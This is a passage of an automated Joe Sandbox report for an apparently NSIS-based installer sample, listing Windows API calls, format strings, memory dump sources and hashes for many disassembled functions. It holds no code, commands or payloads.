                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Timeout
                                                                                          • String ID: !
                                                                                          • API String ID: 1777923405-2657877971
                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                          • String ID: %u.%u%s%s
                                                                                          • API String ID: 3540041739-3551169577
                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                          APIs
                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          Strings
                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                          • API String ID: 1697273262-1764544995
                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                          APIs
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                          • API String ID: 2577523808-3778932970
                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcatwsprintf
                                                                                          • String ID: %02x%c$...
                                                                                          • API String ID: 3065427908-1057055748
                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                          APIs
                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                          • API String ID: 2266616436-4211696005
                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406902
                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1599320355-0
                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                          APIs
                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                          • String ID: Version
                                                                                          • API String ID: 512980652-315105994
                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                          • String ID:
                                                                                          • API String ID: 2102729457-0
                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                          • String ID:
                                                                                          • API String ID: 2883127279-0
                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                          • String ID:
                                                                                          • API String ID: 3748168415-3916222277
                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                          • String ID: !N~
                                                                                          • API String ID: 623250636-529124213
                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                          Strings
                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess
                                                                                          • String ID: Error launching installer
                                                                                          • API String ID: 3712363035-66219284
                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
